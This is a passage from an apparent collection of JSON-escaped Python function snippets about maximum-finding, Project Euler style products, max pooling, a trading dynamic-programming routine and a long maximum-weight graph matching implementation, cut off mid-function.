current_row -= 1\n current_index = 1\n # If at 0 energy then it must have picked up\n else:\n optimal_solution[col] = 1\n current_row += 1\n if memo[col - 1][1][0] is None:\n current_index = 1\n elif memo[col - 1][1][1] is None:\n current_index = 0\n else:\n if memo[col - 1][1][0] > memo[col - 1][1][1]:\n current_index = 0\n else:\n current_index = 1\n return maxvalue[0], optimal_solution", "def findMax2d(x):\n m, n = x.shape \n x_ = x.ravel()\n idx = np.argmax(x_)\n i = idx // n \n j = idx % n \n return i, j", "def findHighestPkPair(x, pkp): #{\n vrbMsg(5, 'findHighestPkPair() x = [...], pkp = ' + str(pkp))\n mi = [0,0]\n mv = x[pkp[0]]\n for i in range(1, len(pkp)): #{\n nv = x[pkp[i]]\n if(nv > mv): #{\n mi[0] = i\n mv = nv\n #}\n #}\n mv = None\n for i in range(0, len(pkp)): #{\n if(i != mi[0]): #{\n nv = x[pkp[i]]\n if((mv is None) or (nv > mv)): #{\n mi[1] = i\n mv = nv\n #}\n #}\n #}\n if(mi[0] == mi[1]): #{\n mi = [mi[0]]\n elif(mi[0] > mi[1]): #{\n mi = [mi[1], mi[0]]\n #}\n vrbMsg(5, 'findHighestPkPair() mi = ' + str(mi))\n return mi", "def find_max_distance(l):\n\tcomb = list(combinations(list(range(1, len(l))), 2))\n\tx, y, max_distance = 0, 0, 0\n\n\tfor i,j in comb:\n\t\tif np.sum(np.abs(l[i]-l[j])) > max_distance:\n\t\t\tx, y, max_distance = i, j, np.sum(np.abs(l[i]-l[j]))\n\treturn x, y, max_distance", "def compute(self, node, input_vals):\r\n #start = time.time()\r\n\r\n #assert len(input_vals) == 1\r\n strides = node.const_attr[1]\r\n ksize = node.const_attr[0]\r\n ish = list(input_vals[0].shape)\r\n input = input_vals[0]\r\n output = np.zeros([ish[0],(ish[1]-ksize[1])//strides[1]+1,(ish[2]-ksize[2])//strides[2]+1,ish[3]])\r\n osh = output.shape\r\n #print(osh)\r\n for i in range(osh[1]):\r\n for j in range(osh[2]):\r\n output[:,i,j,:] = np.amax(input[:,i*strides[1]:(i+1)*strides[1],j*strides[1]:(j+1)*strides[1],:],axis=(1,2))\r\n #end = time.time() \r\n #print(\"max_pool\") \r\n #print(end - start) \r\n return output\r\n \r\n #assert False\r", "def max_pairs(shape):\n\n if not isinstance(shape, (tuple, list)):\n x = get_length(shape)\n n = int(x * (x - 1) / 2)\n\n elif isinstance(shape, (tuple, list)) and len(shape) == 1:\n x = get_length(shape[0])\n n = int(x * (x - 1) / 2)\n\n else:\n n = numpy.prod([get_length(xi) for xi in shape])\n\n return n", "def find_max_triples(st_prob, ed_prob, top_n=5, prob_thd=None, tensor_type=\"torch\"):\n if tensor_type == \"torch\":\n st_prob, ed_prob = st_prob.data.numpy(), ed_prob.data.numpy()\n product = np.einsum(\"bm,bn->bmn\", st_prob, ed_prob)\n # (N, L, L) the lower part becomes zeros, start_idx < ed_idx\n upper_product = np.triu(product, k=1)\n return find_max_triples_from_upper_triangle_product(upper_product, top_n=top_n, prob_thd=prob_thd)", "def test_computes_max_nth_digit_by_multiples_of_two(self):\t\t\n\t\tself.assertEqual(64, products_of_multiplied_nth_digits(20, 2))", "def find_optimal_strategy(prices, max_position=3, cost_per_trade=0.02):\n buy_price = np.maximum(prices.bid_price, prices.ask_price).values\n sell_price = np.minimum(prices.bid_price, prices.ask_price).values\n\n account = np.full((prices.shape[0] + 1, 2 * max_position + 3), -np.inf)\n account[0, max_position + 1] = 0\n\n actions = np.empty((prices.shape[0], 2 * max_position + 3), dtype=int)\n\n for i in range(prices.shape[0]):\n for j in range(1, account.shape[1] - 1):\n buy = account[i, j - 1] - cost_per_trade - buy_price[i]\n sell = account[i, j + 1] - cost_per_trade + sell_price[i]\n hold = account[i, j]\n if buy > sell and buy > hold:\n account[i + 1, j] = buy\n actions[i, j] = 1\n elif sell > buy and sell > hold:\n account[i + 1, j] = sell\n actions[i, j] = -1\n else:\n account[i + 1, j] = hold\n actions[i, j] = 0\n\n pnl = account[-1, 1:-1] + (np.arange(-max_position, max_position + 1) *\n prices.market_price.iloc[-1])\n j = np.argmax(pnl) + 1\n optimal_sequence = []\n for i in reversed(range(actions.shape[0])):\n optimal_sequence.append(actions[i, j])\n j -= actions[i, j]\n optimal_sequence = np.array(list(reversed(optimal_sequence)))\n\n return optimal_sequence, np.max(pnl) / optimal_sequence.size", "def getOptimalSolution(self):\n max_index = np.argmax(self.Ws)\n self.Wmax = self.Ws[max_index]\n self.Emax = self.subsets[max_index]\n return (self.Wmax, self.Emax)", "def find_pair(numbers, target_sum):\n for num in numbers:\n partner_num = target_sum - num\n if partner_num in numbers:\n return num * partner_num", "def greatest_adjacent_product(target, window):\n stringified = str(target)\n length = len(stringified)\n greatest_product = None\n\n for i in range(length):\n digits = stringified[i:i+window]\n\n # Stop if we've reached the end of the target.\n if len(digits) < window:\n break\n\n product = int(digits[0])\n for digit in digits[1:]:\n product *= int(digit)\n\n if greatest_product is None or product > greatest_product:\n greatest_product = product\n\n return greatest_product", "def _max_bits_used_in_function_in_round():\n word_size = 16\n bits_occupied = [word_size] * len(cost_functions)\n for (pa, pb) in all_possible_pairs:\n for i in range(len(cost_functions)):\n max_sum_of_cost = num_pairings_in_round * \\\n cost_functions[i](pa, pb)\n while (max_sum_of_cost >= 2**bits_occupied[i]):\n bits_occupied[i] *= 2\n bits_occupied = [2*b for b in bits_occupied] # Paranoia\n for b in bits_occupied:\n assert(b % word_size == 0)\n return max(bits_occupied)", "def solve():\n result = 1\n map = dict()\n for x in range(2, 20):\n temp = prime_factors(x)\n for n in range(2, 20):\n if n in temp:\n if n in map:\n map[n] = max(temp.count(n), map[n])\n else:\n map[n] = temp.count(n)\n\n for x in map:\n result *= (x ** map[x])\n\n return result", "def problem9_naive(n):\n for a in range(4, n, 4):\n for b in range(3, n - a):\n c = n - a - b\n if a ** 2 + b ** 2 == c ** 2:\n return a * b * c\n return None", "def main():\n largest = 0\n for i in range(100, 999):\n for j in range(100, 999):\n if i * j > largest and is_palindrome(i * j):\n largest = i * j\n\n print \"The largest palindrome product of two 3-digits nums is %d \" % largest", "def largest_n_adjacent_product(fname, n):\n with open(fname, \"r\") as f:\n s = \"\"\n for line in f:\n s += line[:-1]\n \n largest = 0\n for i in range(1000 - (n-1)):\n adj_n = s[i:i+n]\n product = 1\n for j in adj_n:\n product *= int(j)\n if product > largest:\n largest = product\n return largest", "def test_largest_product_one_array():\n assert largest_product([[1, 2]]) == 2", "def getmulticombos(peeps):\n\n\tret = []\n\n\tfor p in peeps:\n\t\tu,s = getcombos(p)\n\n\t\tbestu = getbesttriplet(u)\n\t\tbests = getbesttriplet(s)\n\n\t\tret.append((bestu, bests))\n\n\treturn ret", "def largestProductInSeries(string : str,length:int):\n \n greatest_prod = -sys.maxsize -1\n greatest_prod_digits = \"\"\n for i in range(len(string)-length-1):\n prod_digits = \"\"\n product = 1\n for j in range(length):\n digit = int(string[i+j])\n prod_digits = prod_digits+str(digit)\n product *= digit\n \n print(greatest_prod_digits+\" \"+str(product))\n \n if product > greatest_prod :\n greatest_prod = product\n greatest_prod_digits = prod_digits\n\n return (greatest_prod_digits,greatest_prod)", "def pool(x):\n return F.max_pool2d(x, 2, 2)", "def get_max_sum4(a):\n return max(get_max_sum2(a), 0)", "def main():\n limit = 1000\n max_primes = 0\n max_b, max_c = 0, 0\n is_prime = sieve_of_eratosthenes_bool(limit * 100)\n primes = sieve_of_eratosthenes(limit)\n for c in primes:\n for b in range(-c, limit, 2):\n for n in count(1):\n res = n * n + b * n + c\n if res < 1 or not is_prime[res]:\n if max_primes < n:\n max_primes = n\n max_b, max_c = b, c\n print(max_primes, max_b, max_c, end='\\n')\n break\n print(max_b, max_c, max_b * max_c)", "def maxWeightMatching(edges, maxcardinality=False):\r\n\r\n #\r\n # Vertices are numbered 0 .. (nvertex-1).\r\n # Non-trivial blossoms are numbered nvertex .. (2*nvertex-1)\r\n #\r\n # Edges are numbered 0 .. (nedge-1).\r\n # Edge endpoints are numbered 0 .. (2*nedge-1), such that endpoints\r\n # (2*k) and (2*k+1) both belong to edge k.\r\n #\r\n # Many terms used in the comments (sub-blossom, T-vertex) come from\r\n # the paper by Galil; read the paper before reading this code.\r\n #\r\n\r\n # Python 2/3 compatibility.\r\n from sys import version as sys_version\r\n if sys_version < '3':\r\n integer_types = (int, long)\r\n else:\r\n integer_types = (int,)\r\n\r\n # Deal swiftly with empty graphs.\r\n if not edges:\r\n return [ ]\r\n\r\n # Count vertices.\r\n nedge = len(edges)\r\n nvertex = 0\r\n for (i, j, w) in edges:\r\n assert i >= 0 and j >= 0 #and i != j\r\n if i >= nvertex:\r\n nvertex = i + 1\r\n if j >= nvertex:\r\n nvertex = j + 1\r\n\r\n # Find the maximum edge weight.\r\n maxweight = max(0, max([ wt for (i, j, wt) in edges ]))\r\n\r\n # If p is an edge endpoint,\r\n # endpoint[p] is the vertex to which endpoint p is attached.\r\n # Not modified by the algorithm.\r\n endpoint = [ edges[p//2][p%2] for p in range(2*nedge) ]\r\n\r\n # If v is a vertex,\r\n # neighbend[v] is the list of remote endpoints of the edges attached to v.\r\n # Not modified by the algorithm.\r\n neighbend = [ [ ] for i in range(nvertex) ]\r\n for k in range(len(edges)):\r\n (i, j, w) = edges[k]\r\n neighbend[i].append(2*k+1)\r\n neighbend[j].append(2*k)\r\n\r\n # If v is a vertex,\r\n # mate[v] is the remote endpoint of its matched edge, or -1 if it is single\r\n # (i.e. endpoint[mate[v]] is v's partner vertex).\r\n # Initially all vertices are single; updated during augmentation.\r\n mate = nvertex * [ -1 ]\r\n\r\n # If b is a top-level blossom,\r\n # label[b] is 0 if b is unlabeled (free);\r\n # 1 if b is an S-vertex/blossom;\r\n # 2 if b is a T-vertex/blossom.\r\n # The label of a vertex is found by looking at the label of its\r\n # top-level containing blossom.\r\n # If v is a vertex inside a T-blossom,\r\n # label[v] is 2 iff v is reachable from an S-vertex outside the blossom.\r\n # Labels are assigned during a stage and reset after each augmentation.\r\n label = (2 * nvertex) * [ 0 ]\r\n\r\n # If b is a labeled top-level blossom,\r\n # labelend[b] is the remote endpoint of the edge through which b obtained\r\n # its label, or -1 if b's base vertex is single.\r\n # If v is a vertex inside a T-blossom and label[v] == 2,\r\n # labelend[v] is the remote endpoint of the edge through which v is\r\n # reachable from outside the blossom.\r\n labelend = (2 * nvertex) * [ -1 ]\r\n\r\n # If v is a vertex,\r\n # inblossom[v] is the top-level blossom to which v belongs.\r\n # If v is a top-level vertex, v is itself a blossom (a trivial blossom)\r\n # and inblossom[v] == v.\r\n # Initially all vertices are top-level trivial blossoms.\r\n inblossom = list(range(nvertex))\r\n\r\n # If b is a sub-blossom,\r\n # blossomparent[b] is its immediate parent (sub-)blossom.\r\n # If b is a top-level blossom, blossomparent[b] is -1.\r\n blossomparent = (2 * nvertex) * [ -1 ]\r\n\r\n # If b is a non-trivial (sub-)blossom,\r\n # blossomchilds[b] is an ordered list of its sub-blossoms, starting with\r\n # the base and going round the blossom.\r\n blossomchilds = (2 * nvertex) * [ None ]\r\n\r\n # If b is a (sub-)blossom,\r\n # blossombase[b] is its base VERTEX (i.e. recursive sub-blossom).\r\n blossombase = list(range(nvertex)) + nvertex * [ -1 ]\r\n\r\n # If b is a non-trivial (sub-)blossom,\r\n # blossomendps[b] is a list of endpoints on its connecting edges,\r\n # such that blossomendps[b][i] is the local endpoint of blossomchilds[b][i]\r\n # on the edge that connects it to blossomchilds[b][wrap(i+1)].\r\n blossomendps = (2 * nvertex) * [ None ]\r\n\r\n # If v is a free vertex (or an unreached vertex inside a T-blossom),\r\n # bestedge[v] is the edge to an S-vertex with least slack,\r\n # or -1 if there is no such edge.\r\n # If b is a (possibly trivial) top-level S-blossom,\r\n # bestedge[b] is the least-slack edge to a different S-blossom,\r\n # or -1 if there is no such edge.\r\n # This is used for efficient computation of delta2 and delta3.\r\n bestedge = (2 * nvertex) * [ -1 ]\r\n\r\n # If b is a non-trivial top-level S-blossom,\r\n # blossombestedges[b] is a list of least-slack edges to neighbouring\r\n # S-blossoms, or None if no such list has been computed yet.\r\n # This is used for efficient computation of delta3.\r\n blossombestedges = (2 * nvertex) * [ None ]\r\n\r\n # List of currently unused blossom numbers.\r\n unusedblossoms = list(range(nvertex, 2*nvertex))\r\n\r\n # If v is a vertex,\r\n # dualvar[v] = 2 * u(v) where u(v) is the v's variable in the dual\r\n # optimization problem (multiplication by two ensures integer values\r\n # throughout the algorithm if all edge weights are integers).\r\n # If b is a non-trivial blossom,\r\n # dualvar[b] = z(b) where z(b) is b's variable in the dual optimization\r\n # problem.\r\n dualvar = nvertex * [ maxweight ] + nvertex * [ 0 ]\r\n\r\n # If allowedge[k] is true, edge k has zero slack in the optimization\r\n # problem; if allowedge[k] is false, the edge's slack may or may not\r\n # be zero.\r\n allowedge = nedge * [ False ]\r\n\r\n # Queue of newly discovered S-vertices.\r\n queue = [ ]\r\n\r\n # Return 2 * slack of edge k (does not work inside blossoms).\r\n def slack(k):\r\n (i, j, wt) = edges[k]\r\n return dualvar[i] + dualvar[j] - 2 * wt\r\n\r\n # Generate the leaf vertices of a blossom.\r\n def blossomLeaves(b):\r\n if b < nvertex:\r\n yield b\r\n else:\r\n for t in blossomchilds[b]:\r\n if t < nvertex:\r\n yield t\r\n else:\r\n for v in blossomLeaves(t):\r\n yield v\r\n\r\n # Assign label t to the top-level blossom containing vertex w\r\n # and record the fact that w was reached through the edge with\r\n # remote endpoint p.\r\n def assignLabel(w, t, p):\r\n if DEBUG: DEBUG('assignLabel(%d,%d,%d)' % (w, t, p))\r\n b = inblossom[w]\r\n assert label[w] == 0 and label[b] == 0\r\n label[w] = label[b] = t\r\n labelend[w] = labelend[b] = p\r\n bestedge[w] = bestedge[b] = -1\r\n if t == 1:\r\n # b became an S-vertex/blossom; add it(s vertices) to the queue.\r\n queue.extend(blossomLeaves(b))\r\n if DEBUG: DEBUG('PUSH ' + str(list(blossomLeaves(b))))\r\n elif t == 2:\r\n # b became a T-vertex/blossom; assign label S to its mate.\r\n # (If b is a non-trivial blossom, its base is the only vertex\r\n # with an external mate.)\r\n base = blossombase[b]\r\n assert mate[base] >= 0\r\n assignLabel(endpoint[mate[base]], 1, mate[base] ^ 1)\r\n\r\n # Trace back from vertices v and w to discover either a new blossom\r\n # or an augmenting path. Return the base vertex of the new blossom or -1.\r\n def scanBlossom(v, w):\r\n if DEBUG: DEBUG('scanBlossom(%d,%d)' % (v, w))\r\n # Trace back from v and w, placing breadcrumbs as we go.\r\n path = [ ]\r\n base = -1\r\n while v != -1 or w != -1:\r\n # Look for a breadcrumb in v's blossom or put a new breadcrumb.\r\n b = inblossom[v]\r\n if label[b] & 4:\r\n base = blossombase[b]\r\n break\r\n assert label[b] == 1\r\n path.append(b)\r\n label[b] = 5\r\n # Trace one step back.\r\n assert labelend[b] == mate[blossombase[b]]\r\n if labelend[b] == -1:\r\n # The base of blossom b is single; stop tracing this path.\r\n v = -1\r\n else:\r\n v = endpoint[labelend[b]]\r\n b = inblossom[v]\r\n assert label[b] == 2\r\n # b is a T-blossom; trace one more step back.\r\n assert labelend[b] >= 0\r\n v = endpoint[labelend[b]]\r\n # Swap v and w so that we alternate between both paths.\r\n if w != -1:\r\n v, w = w, v\r\n # Remove breadcrumbs.\r\n for b in path:\r\n label[b] = 1\r\n # Return base vertex, if we found one.\r\n return base\r\n\r\n # Construct a new blossom with given base, containing edge k which\r\n # connects a pair of S vertices. Label the new blossom as S; set its dual\r\n # variable to zero; relabel its T-vertices to S and add them to the queue.\r\n def addBlossom(base, k):\r\n (v, w, wt) = edges[k]\r\n bb = inblossom[base]\r\n bv = inblossom[v]\r\n bw = inblossom[w]\r\n # Create blossom.\r\n b = unusedblossoms.pop()\r\n if DEBUG: DEBUG('addBlossom(%d,%d) (v=%d w=%d) -> %d' % (base, k, v, w, b))\r\n blossombase[b] = base\r\n blossomparent[b] = -1\r\n blossomparent[bb] = b\r\n # Make list of sub-blossoms and their interconnecting edge endpoints.\r\n blossomchilds[b] = path = [ ]\r\n blossomendps[b] = endps = [ ]\r\n # Trace back from v to base.\r\n while bv != bb:\r\n # Add bv to the new blossom.\r\n blossomparent[bv] = b\r\n path.append(bv)\r\n endps.append(labelend[bv])\r\n assert (label[bv] == 2 or\r\n (label[bv] == 1 and labelend[bv] == mate[blossombase[bv]]))\r\n # Trace one step back.\r\n assert labelend[bv] >= 0\r\n v = endpoint[labelend[bv]]\r\n bv = inblossom[v]\r\n # Reverse lists, add endpoint that connects the pair of S vertices.\r\n path.append(bb)\r\n path.reverse()\r\n endps.reverse()\r\n endps.append(2*k)\r\n # Trace back from w to base.\r\n while bw != bb:\r\n # Add bw to the new blossom.\r\n blossomparent[bw] = b\r\n path.append(bw)\r\n endps.append(labelend[bw] ^ 1)\r\n assert (label[bw] == 2 or\r\n (label[bw] == 1 and labelend[bw] == mate[blossombase[bw]]))\r\n # Trace one step back.\r\n assert labelend[bw] >= 0\r\n w = endpoint[labelend[bw]]\r\n bw = inblossom[w]\r\n # Set label to S.\r\n assert label[bb] == 1\r\n label[b] = 1\r\n labelend[b] = labelend[bb]\r\n # Set dual variable to zero.\r\n dualvar[b] = 0\r\n # Relabel vertices.\r\n for v in blossomLeaves(b):\r\n if label[inblossom[v]] == 2:\r\n # This T-vertex now turns into an S-vertex because it becomes\r\n # part of an S-blossom; add it to the queue.\r\n queue.append(v)\r\n inblossom[v] = b\r\n # Compute blossombestedges[b].\r\n bestedgeto = (2 * nvertex) * [ -1 ]\r\n for bv in path:\r\n if blossombestedges[bv] is None:\r\n # This subblossom does not have a list of least-slack edges;\r\n # get the information from the vertices.\r\n nblists = [ [ p // 2 for p in neighbend[v] ]\r\n for v in blossomLeaves(bv) ]\r\n else:\r\n # Walk this subblossom's least-slack edges.\r\n nblists = [ blossombestedges[bv] ]\r\n for nblist in nblists:\r\n for k in nblist:\r\n (i, j, wt) = edges[k]\r\n if inblossom[j] == b:\r\n i, j = j, i\r\n bj = inblossom[j]\r\n if (bj != b and label[bj] == 1 and\r\n (bestedgeto[bj] == -1 or\r\n slack(k) < slack(bestedgeto[bj]))):\r\n bestedgeto[bj] = k\r\n # Forget about least-slack edges of the subblossom.\r\n blossombestedges[bv] = None\r\n bestedge[bv] = -1\r\n blossombestedges[b] = [ k for k in bestedgeto if k != -1 ]\r\n # Select bestedge[b].\r\n bestedge[b] = -1\r\n for k in blossombestedges[b]:\r\n if bestedge[b] == -1 or slack(k) < slack(bestedge[b]):\r\n bestedge[b] = k\r\n if DEBUG: DEBUG('blossomchilds[%d]=' % b + repr(blossomchilds[b]))\r\n\r\n # Expand the given top-level blossom.\r\n def expandBlossom(b, endstage):\r\n if DEBUG: DEBUG('expandBlossom(%d,%d) %s' % (b, endstage, repr(blossomchilds[b])))\r\n # Convert sub-blossoms into top-level blossoms.\r\n for s in blossomchilds[b]:\r\n blossomparent[s] = -1\r\n if s < nvertex:\r\n inblossom[s] = s\r\n elif endstage and dualvar[s] == 0:\r\n # Recursively expand this sub-blossom.\r\n expandBlossom(s, endstage)\r\n else:\r\n for v in blossomLeaves(s):\r\n inblossom[v] = s\r\n # If we expand a T-blossom during a stage, its sub-blossoms must be\r\n # relabeled.\r\n if (not endstage) and label[b] == 2:\r\n # Start at the sub-blossom through which the expanding\r\n # blossom obtained its label, and relabel sub-blossoms untili\r\n # we reach the base.\r\n # Figure out through which sub-blossom the expanding blossom\r\n # obtained its label initially.\r\n assert labelend[b] >= 0\r\n entrychild = inblossom[endpoint[labelend[b] ^ 1]]\r\n # Decide in which direction we will go round the blossom.\r\n j = blossomchilds[b].index(entrychild)\r\n if j & 1:\r\n # Start index is odd; go forward and wrap.\r\n j -= len(blossomchilds[b])\r\n jstep = 1\r\n endptrick = 0\r\n else:\r\n # Start index is even; go backward.\r\n jstep = -1\r\n endptrick = 1\r\n # Move along the blossom until we get to the base.\r\n p = labelend[b]\r\n while j != 0:\r\n # Relabel the T-sub-blossom.\r\n label[endpoint[p ^ 1]] = 0\r\n label[endpoint[blossomendps[b][j-endptrick]^endptrick^1]] = 0\r\n assignLabel(endpoint[p ^ 1], 2, p)\r\n # Step to the next S-sub-blossom and note its forward endpoint.\r\n allowedge[blossomendps[b][j-endptrick]//2] = True\r\n j += jstep\r\n p = blossomendps[b][j-endptrick] ^ endptrick\r\n # Step to the next T-sub-blossom.\r\n allowedge[p//2] = True\r\n j += jstep\r\n # Relabel the base T-sub-blossom WITHOUT stepping through to\r\n # its mate (so don't call assignLabel).\r\n bv = blossomchilds[b][j]\r\n label[endpoint[p ^ 1]] = label[bv] = 2\r\n labelend[endpoint[p ^ 1]] = labelend[bv] = p\r\n bestedge[bv] = -1\r\n # Continue along the blossom until we get back to entrychild.\r\n j += jstep\r\n while blossomchilds[b][j] != entrychild:\r\n # Examine the vertices of the sub-blossom to see whether\r\n # it is reachable from a neighbouring S-vertex outside the\r\n # expanding blossom.\r\n bv = blossomchilds[b][j]\r\n if label[bv] == 1:\r\n # This sub-blossom just got label S through one of its\r\n # neighbours; leave it.\r\n j += jstep\r\n continue\r\n for v in blossomLeaves(bv):\r\n if label[v] != 0:\r\n break\r\n # If the sub-blossom contains a reachable vertex, assign\r\n # label T to the sub-blossom.\r\n if label[v] != 0:\r\n assert label[v] == 2\r\n assert inblossom[v] == bv\r\n label[v] = 0\r\n label[endpoint[mate[blossombase[bv]]]] = 0\r\n assignLabel(v, 2, labelend[v])\r\n j += jstep\r\n # Recycle the blossom number.\r\n label[b] = labelend[b] = -1\r\n blossomchilds[b] = blossomendps[b] = None\r\n blossombase[b] = -1\r\n blossombestedges[b] = None\r\n bestedge[b] = -1\r\n unusedblossoms.append(b)\r\n\r\n # Swap matched/unmatched edges over an alternating path through blossom b\r\n # between vertex v and the base vertex. Keep blossom bookkeeping consistent.\r\n def augmentBlossom(b, v):\r\n if DEBUG: DEBUG('augmentBlossom(%d,%d)' % (b, v))\r\n # Bubble up through the blossom tree from vertex v to an immediate\r\n # sub-blossom of b.\r\n t = v\r\n while blossomparent[t] != b:\r\n t = blossomparent[t]\r\n # Recursively deal with the first sub-blossom.\r\n if t >= nvertex:\r\n augmentBlossom(t, v)\r\n # Decide in which direction we will go round the blossom.\r\n i = j = blossomchilds[b].index(t)\r\n if i & 1:\r\n # Start index is odd; go forward and wrap.\r\n j -= len(blossomchilds[b])\r\n jstep = 1\r\n endptrick = 0\r\n else:\r\n # Start index is even; go backward.\r\n jstep = -1\r\n endptrick = 1\r\n # Move along the blossom until we get to the base.\r\n while j != 0:\r\n # Step to the next sub-blossom and augment it recursively.\r\n j += jstep\r\n t = blossomchilds[b][j]\r\n p = blossomendps[b][j-endptrick] ^ endptrick\r\n if t >= nvertex:\r\n augmentBlossom(t, endpoint[p])\r\n # Step to the next sub-blossom and augment it recursively.\r\n j += jstep\r\n t = blossomchilds[b][j]\r\n if t >= nvertex:\r\n augmentBlossom(t, endpoint[p ^ 1])\r\n # Match the edge connecting those sub-blossoms.\r\n mate[endpoint[p]] = p ^ 1\r\n mate[endpoint[p ^ 1]] = p\r\n if DEBUG: DEBUG('PAIR %d %d (k=%d)' % (endpoint[p], endpoint[p^1], p//2))\r\n # Rotate the list of sub-blossoms to put the new base at the front.\r\n blossomchilds[b] = blossomchilds[b][i:] + blossomchilds[b][:i]\r\n blossomendps[b] = blossomendps[b][i:] + blossomendps[b][:i]\r\n blossombase[b] = blossombase[blossomchilds[b][0]]\r\n assert blossombase[b] == v\r\n\r\n # Swap matched/unmatched edges over an alternating path between two\r\n # single vertices. The augmenting path runs through edge k, which\r\n # connects a pair of S vertices.\r\n def augmentMatching(k):\r\n (v, w, wt) = edges[k]\r\n if DEBUG: DEBUG('augmentMatching(%d) (v=%d w=%d)' % (k, v, w))\r\n if DEBUG: DEBUG('PAIR %d %d (k=%d)' % (v, w, k))\r\n for (s, p) in ((v, 2*k+1), (w, 2*k)):\r\n # Match vertex s to remote endpoint p. Then trace back from s\r\n # until we find a single vertex, swapping matched and unmatched\r\n # edges as we go.\r\n while 1:\r\n bs = inblossom[s]\r\n assert label[bs] == 1\r\n assert labelend[bs] == mate[blossombase[bs]]\r\n # Augment through the S-blossom from s to base.\r\n if bs >= nvertex:\r\n augmentBlossom(bs, s)\r\n # Update mate[s]\r\n mate[s] = p\r\n # Trace one step back.\r\n if labelend[bs] == -1:\r\n # Reached single vertex; stop.\r\n break\r\n t = endpoint[labelend[bs]]\r\n bt = inblossom[t]\r\n assert label[bt] == 2\r\n # Trace one step back.\r\n assert labelend[bt] >= 0\r\n s = endpoint[labelend[bt]]\r\n j = endpoint[labelend[bt] ^ 1]\r\n # Augment through the T-blossom from j to base.\r\n assert blossombase[bt] == t\r\n if bt >= nvertex:\r\n augmentBlossom(bt, j)\r\n # Update mate[j]\r\n mate[j] = labelend[bt]\r\n # Keep the opposite endpoint;\r\n # it will be assigned to mate[s] in the next step.\r\n p = labelend[bt] ^ 1\r\n if DEBUG: DEBUG('PAIR %d %d (k=%d)' % (s, t, p//2))\r\n\r\n # Verify that the optimum solution has been reached.\r\n def verifyOptimum():\r\n if maxcardinality:\r\n # Vertices may have negative dual;\r\n # find a constant non-negative number to add to all vertex duals.\r\n vdualoffset = max(0, -min(dualvar[:nvertex]))\r\n else:\r\n vdualoffset = 0\r\n # 0. all dual variables are non-negative\r\n assert min(dualvar[:nvertex]) + vdualoffset >= 0\r\n assert min(dualvar[nvertex:]) >= 0\r\n # 0. all edges have non-negative slack and\r\n # 1. all matched edges have zero slack;\r\n for k in range(nedge):\r\n (i, j, wt) = edges[k]\r\n s = dualvar[i] + dualvar[j] - 2 * wt\r\n iblossoms = [ i ]\r\n jblossoms = [ j ]\r\n while blossomparent[iblossoms[-1]] != -1:\r\n iblossoms.append(blossomparent[iblossoms[-1]])\r\n while blossomparent[jblossoms[-1]] != -1:\r\n jblossoms.append(blossomparent[jblossoms[-1]])\r\n iblossoms.reverse()\r\n jblossoms.reverse()\r\n for (bi, bj) in zip(iblossoms, jblossoms):\r\n if bi != bj:\r\n break\r\n s += 2 * dualvar[bi]\r\n #assert s >= 0\r\n if mate[i] // 2 == k or mate[j] // 2 == k:\r\n assert mate[i] // 2 == k and mate[j] // 2 == k\r\n assert s == 0\r\n # 2. all single vertices have zero dual value;\r\n for v in range(nvertex):\r\n assert mate[v] >= 0 or dualvar[v] + vdualoffset == 0\r\n # 3. all blossoms with positive dual value are full.\r\n for b in range(nvertex, 2*nvertex):\r\n if blossombase[b] >= 0 and dualvar[b] > 0:\r\n assert len(blossomendps[b]) % 2 == 1\r\n for p in blossomendps[b][1::2]:\r\n assert mate[endpoint[p]] == p ^ 1\r\n assert mate[endpoint[p ^ 1]] == p\r\n # Ok.\r\n\r\n # Check optimized delta2 against a trivial computation.\r\n def checkDelta2():\r\n for v in range(nvertex):\r\n if label[inblossom[v]] == 0:\r\n bd = None\r\n bk = -1\r\n for p in neighbend[v]:\r\n k = p // 2\r\n w = endpoint[p]\r\n if label[inblossom[w]] == 1:\r\n d = slack(k)\r\n if bk == -1 or d < bd:\r\n bk = k\r\n bd = d\r\n if DEBUG and (bestedge[v] != -1 or bk != -1) and (bestedge[v] == -1 or bd != slack(bestedge[v])):\r\n DEBUG('v=' + str(v) + ' bk=' + str(bk) + ' bd=' + str(bd) + ' bestedge=' + str(bestedge[v]) + ' slack=' + str(slack(bestedge[v])))\r\n assert (bk == -1 and bestedge[v] == -1) or (bestedge[v] != -1 and bd == slack(bestedge[v]))\r\n\r\n # Check optimized delta3 against a trivial computation.\r\n def checkDelta3():\r\n bk = -1\r\n bd = None\r\n tbk = -1\r\n tbd = None\r\n for b in range(2 * nvertex):\r\n if blossomparent[b] == -1 and label[b] == 1:\r\n for v in blossomLeaves(b):\r\n for p in neighbend[v]:\r\n k = p // 2\r\n w = endpoint[p]\r\n if inblossom[w] != b and label[inblossom[w]] == 1:\r\n d = slack(k)\r\n if bk == -1 or d < bd:\r\n bk = k\r\n bd = d\r\n if bestedge[b] != -1:\r\n (i, j, wt) = edges[bestedge[b]]\r\n assert inblossom[i] == b or inblossom[j] == b\r\n assert inblossom[i] != b or inblossom[j] != b\r\n assert label[inblossom[i]] == 1 and label[inblossom[j]] == 1\r\n if tbk == -1 or slack(bestedge[b]) < tbd:\r\n tbk = bestedge[b]\r\n tbd = slack(bestedge[b])\r\n if DEBUG and bd != tbd:\r\n DEBUG('bk=%d tbk=%d bd=%s tbd=%s' % (bk, tbk, repr(bd), repr(tbd)))\r\n assert bd == tbd\r\n\r\n # Main loop: continue until no further improvement is possible.\r\n for t in range(nvertex):\r\n\r\n # Each iteration of this loop is a \"stage\".\r\n # A stage finds an augmenting path and uses that to improve\r\n # the matching.\r\n if DEBUG: DEBUG('STAGE %d' % t)\r\n\r\n # Remove labels from top-level blossoms/vertices.\r\n label[:] = (2 * nvertex) * [ 0 ]\r\n\r\n # Forget all about least-slack edges.\r\n bestedge[:] = (2 * nvertex) * [ -1 ]\r\n blossombestedges[nvertex:] = nvertex * [ None ]\r\n\r\n # Loss of labeling means that we can not be sure that currently\r\n # allowable edges remain allowable througout this stage.\r\n allowedge[:] = nedge * [ False ]\r\n\r\n # Make queue empty.\r\n queue[:] = [ ]\r\n \r\n # Label single blossoms/vertices with S and put them in the queue.\r\n for v in range(nvertex):\r\n if mate[v] == -1 and label[inblossom[v]] == 0:\r\n assignLabel(v, 1, -1)\r\n\r\n # Loop until we succeed in augmenting the matching.\r\n augmented = 0\r\n while 1:\r\n\r\n # Each iteration of this loop is a \"substage\".\r\n # A substage tries to find an augmenting path;\r\n # if found, the path is used to improve the matching and\r\n # the stage ends. If there is no augmenting path, the\r\n # primal-dual method is used to pump some slack out of\r\n # the dual variables.\r\n if DEBUG: 